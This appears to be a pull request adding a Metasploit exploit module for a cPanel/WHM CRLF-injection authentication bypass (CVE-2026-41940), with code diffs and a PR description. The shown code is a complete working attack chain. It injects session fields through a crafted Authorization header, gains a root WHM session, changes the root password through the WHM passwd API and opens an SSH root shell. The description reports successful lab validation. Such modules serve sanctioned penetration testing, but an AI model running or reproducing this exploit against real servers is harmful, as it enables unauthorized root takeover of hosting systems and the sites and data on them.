+
+    vprint_status('Session fields promoted to cache')
+  end
+
+  def verify_auth_bypass(session_name, token)
+    # Retry up to 3 times with a brief sleep between attempts.
+    # do_token_denied promotes the raw session fields to the JSON cache asynchronously;
+    # the first attempt may arrive before cpsrvd finishes writing.
+    3.times do |attempt|
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, token, 'json-api', 'version'),
+        'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
+      )
+      return true if res&.code == 200 && res.body.to_s.include?('"version"')
+
+      if attempt < 2
+        vprint_status("Auth bypass not yet confirmed (attempt #{attempt + 1}/3), retrying...")
+        Rex.sleep(2)
+      end
+    end
+
+    false
+  end
+
+  def whm_api_call(session_name, token, function, params = {})
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, token, 'json-api', function),
+      'vars_get' => { 'api.version' => '1' },
+      'vars_post' => params,
+      'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
+    )
+    fail_with(Failure::Unreachable, "No response from json-api/#{function}") unless res
+
+    res
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'vars_get' => { 'login_only' => '1' },
+      'vars_post' => { 'user' => Rex::Text.rand_text_alpha(8), 'pass' => Rex::Text.rand_text_alpha(12) }
+    )
+    return CheckCode::Unknown('No response from /login') unless res
+
+    m = res.get_cookies.match(/(?:\A|;\s*)whostmgrsession=([^;,\s]+)/i)
+    return CheckCode::Unknown('No whostmgrsession cookie from /login') unless m
+
+    cookie_full_raw = m[1]
+    session_name = Rex::Text.uri_decode(cookie_full_raw).split(',', 2).first
+
+    # Inject expired=1 for a throwaway user to avoid lockout risk
+    b64 = Rex::Text.encode_base64("u#{Rex::Text.rand_text_hex(10)}:\xff\nexpired=1")
+
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => {
+        'Authorization' => "Basic #{b64}",
+        'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}"
+      }
+    )
+    return CheckCode::Unknown('No response from injection step') unless res2
+
+    m2 = res2.headers['Location'].to_s.match(%r{(/cpsess\d{10})})
+    return CheckCode::Safe('No cpsess token - injection did not land') unless m2
+
+    # On a vulnerable target the injected expired=1 surfaces in the session page body
+    res3 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, m2[1], '/'),
+      'headers' => { 'Cookie' => "whostmgrsession=#{cookie_full_raw}" }
+    )
+    return CheckCode::Unknown('No response from session verification step') unless res3
+
+    body = res3.body.to_s
+    if body.include?('expired_session') || body.include?('msg_code')
+      return CheckCode::Vulnerable('CRLF injection confirmed: expired_session marker detected')
+    end
+
+    CheckCode::Safe('Injection payload was filtered - target appears patched')
+  end
+
+  def exploit
+    unless datastore['ALLOW_PASSWORD_CHANGE']
+      fail_with(Failure::BadConfig,
+                'Set ALLOW_PASSWORD_CHANGE true to acknowledge this module changes the root password')
+    end
+
+    tmp_pass = Rex::Text.rand_text_alphanumeric(16) + '!aA1'
+
+    print_status('Minting pre-auth session')
+    session_name = mint_session
+
+    print_status('Injecting session fields via CRLF')
+    token = inject_session_fields(session_name)
+
+    print_status('Triggering session cache promotion')
+    promote_session_cache(session_name)
+
+    print_status('Verifying WHM root access')
+    fail_with(Failure::NotVulnerable, 'Auth bypass failed') unless verify_auth_bypass(session_name, token)
+    print_good('Auth bypass successful - root WHM session obtained')
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'cPanel/WHM CRLF Injection Authentication Bypass (CVE-2026-41940)',
+      info: 'Unauthenticated root WHM session via CRLF injection in cpsrvd session handling',
+      refs: references
+    )
+
+    print_status('Setting temporary root password')
+    res = whm_api_call(session_name, token, 'passwd', 'user' => 'root', 'password' => tmp_pass)
+    body = res.body.to_s
+    passwd_json = nil
+    begin
+      passwd_json = res.get_json_document
+    rescue StandardError
+      nil
+    end
+
+    if res.code == 500 && body.include?('License')
+      fail_with(Failure::NoAccess, 'WHM passwd API requires a valid cPanel license')
+    end
+
+    passwd_ok = passwd_json&.[]('status') == 1 || passwd_json&.dig('metadata', 'result') == 1
+    unless res.code == 200 && passwd_ok
+      fail_with(Failure::UnexpectedReply, "passwd API returned HTTP #{res.code}: #{body[0..200]}")
+    end
+    @tmp_pass_set = true
+    print_good('Root password set')
+
+    print_status('Connecting via SSH')
+    ssh = nil
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, 'root', ssh_client_defaults.merge(
+          auth_methods: ['password'],
+          password: tmp_pass,
+          port: datastore['SSHPORT']
+        ))
+      end
+    rescue ::Net::SSH::AuthenticationFailed => e
+      restore_passwd(session_name, token)
+      fail_with(Failure::NoAccess, "SSH authentication failed: #{e.message}")
+    rescue ::Net::SSH::Exception, ::Timeout::Error, ::EOFError => e
+      restore_passwd(session_name, token)
+      fail_with(Failure::Unreachable, "SSH connection failed: #{e.message}")
+    end
+
+    # Use the SSH channel directly as the session.
+    # handler(conn.lsock) must be the LAST call — it notifies the session waiter
+    # event that ExploitDriver polls after exploit() returns.
+    conn = Net::SSH::CommandStream.new(ssh)
+
+    # Rotate the temporary password before handing off to the session.
+    # This ensures the temp cred is short-lived even if the operator never
+    # backgrounds the shell.
+    if @tmp_pass_set
+      print_status('Rotating root password')
+      new_pass = Rex::Text.rand_text_alphanumeric(20) + '!aA1'
+      begin
+        whm_api_call(session_name, token, 'passwd', 'user' => 'root', 'password' => new_pass)
+        print_good('Root password rotated')
+        @tmp_pass_set = false
+      rescue StandardError
+        begin
+          sn2 = mint_session
+          tok2 = inject_session_fields(sn2)
+          promote_session_cache(sn2)
+          whm_api_call(sn2, tok2, 'passwd', 'user' => 'root', 'password' => new_pass)
+          print_good('Root password rotated')
+          @tmp_pass_set = false
+        rescue StandardError => e
+          print_warning("Could not rotate root password: #{e.message}")
+          print_warning('Root password may still be set to the temporary value')
+        end
+      end
+    end
+
+    # Signal that a connection is pending so wait_for_session blocks until
+    # the session scheduler completes registration rather than timing out.
+    pc = payload_instance.send(:pending_connections)
+    payload_instance.send(:pending_connections=, pc + 1)
+    handler(conn.lsock)
+  ensure
+    if @tmp_pass_set
+      print_warning('Root password may still be set to the temporary value')
+    end
+  end
+
+  private
+
+  def restore_passwd(session_name, token)
+    whm_api_call(session_name, token, 'passwd',
+                 'user' => 'root', 'password' => Rex::Text.rand_text_alphanumeric(20) + '!aA1')
+  rescue StandardError
+    nil
+  end
+end

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Detected('Service is running and injection landed (cpsess token obtained), but verification request did not respond') unless res3
 
     body = res3.body.to_s
-    if body.include?('expired_session') || body.include?('msg_code')
+    if body.include?('msg_code:[expired_session]')
       return CheckCode::Vulnerable('CRLF injection confirmed: expired_session marker detected')
     end
 


### PR DESCRIPTION
# PR Comment

This PR adds a new exploit module and documentation for CVE-2026-41940 (cPanel/WHM authentication bypass leading to root RCE).

## What's included
- New module: `modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb`
- New docs: `documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md`

## Module behavior
- Uses a high-fidelity `check` flow to confirm session injection in a non-destructive way (`expired=1` marker).
- Default payload: `cmd/unix/interact` (SSH CommandStream -- no reverse listener needed).
- Exploit path:
  1. Mint pre-auth session
  2. Inject session fields via CRLF with no-ob cookie
  3. Trigger cache promotion via `/scripts2/listaccts`
  4. Verify WHM auth bypass via JSON API
  5. Set temporary root password via WHM `passwd` API
  6. Connect via SSH, open `Net::SSH::CommandStream` shell
  7. Rotate temporary password before handing off session
- Exploit execution is gated behind explicit operator consent:
  - `ALLOW_PASSWORD_CHANGE` defaults to `false`
  - operator must set `ALLOW_PASSWORD_CHANGE true` before `run`

## Notes / constraints
- Full exploitation requires a valid cPanel license for the `passwd` API path.
- This module is intentionally destructive: it changes the root password and does not restore the original value.
- The temporary password is rotated to a fresh random value after SSH connection, before session handoff.

## Validation performed
- Ruby syntax check (`ruby -c`) passed
- RuboCop (framework `.rubocop.yml`) -- clean (only `Style/Documentation` which all MSF modules have)
- End-to-end lab validation: root shell session created cleanly on cPanel/WHM 11.136.0.4 (AlmaLinux 8)